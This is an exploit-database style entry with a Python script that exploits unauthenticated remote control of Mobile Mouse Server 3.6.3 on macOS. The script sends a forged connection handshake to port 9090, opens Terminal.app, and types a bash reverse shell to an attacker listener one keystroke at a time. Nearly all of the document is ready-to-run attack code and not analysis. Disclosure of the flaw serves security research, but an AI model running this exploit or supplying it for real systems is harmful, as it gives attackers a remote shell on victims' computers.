# Exploit Title: Mobile Mouse Server 3.6.3 Remote Code Execution
# Date: 2025-06-15
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link:
https://apps.apple.com/us/app/mobile-mouse-server/id412814284
# Version: 3.6.3
# Tested on: MacOS Mojave 10.14.6

'''
Description:
Mobile Mouse Server for macOS exposes a TCP control interface on port 9090,
which accepts plaintext commands to simulate keyboard input and launch
applications. By default, no authentication is required, allowing a remote
attacker to fully control the target system.
'''

#!/usr/bin/env python3
import socket
import time
import sys

target_ip = "192.168.8.104"
target_port = 9090
listener_ip = "192.168.8.100"
listener_port = 4444


CONNECT_CMD =
b"CONNECT\x1e\x1e9D2A1B8C-7F3E-41D6-A5C9-0B3E8D7A1C4F\x1eiPhone\x1e2\x1e2\x1e{length=32,bytes=0x5c8a3f9d1e6b2a04f7c0b9e83d7a2156f...a9b4d3e0f5c8a1b2c3d4e5f6d7e8f9a0b}\x04"

terminal =
b"SENDPROGRAMACTION\x1eRUN\x1e/Applications/Utilities/Terminal.app\x04"


def send_key(sock, key, code="104"):
    payload = b"KEY\x1e" + code.encode() + b"\x1e" + key.encode() +
b"\x1e\x04"
    sock.sendall(payload)


sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

print("[+] Establishing connection...")
sock.sendall(CONNECT_CMD)
time.sleep(1)

try: sock.settimeout(1.0); (lambda r: (print("[!] Target requires password
authentication - not vulnerable"), print("[!] Aborting exploit"),
sock.close(), (_ for _ in ()).throw(SystemExit(1)))[-1] if b"Please enter a
password" in r else None)(sock.recv(1024)); sock.settimeout(None)
except socket.timeout: sock.settimeout(None)


print("[+] Launching Terminal...")
sock.sendall(terminal)
time.sleep(2)

revshell = f"/bin/bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
print("[+] Delivering payload...")
for ch in revshell:
    send_key(sock, ch)
    time.sleep(0.1)


send_key(sock, "ENTER")

time.sleep(2)
sock.close()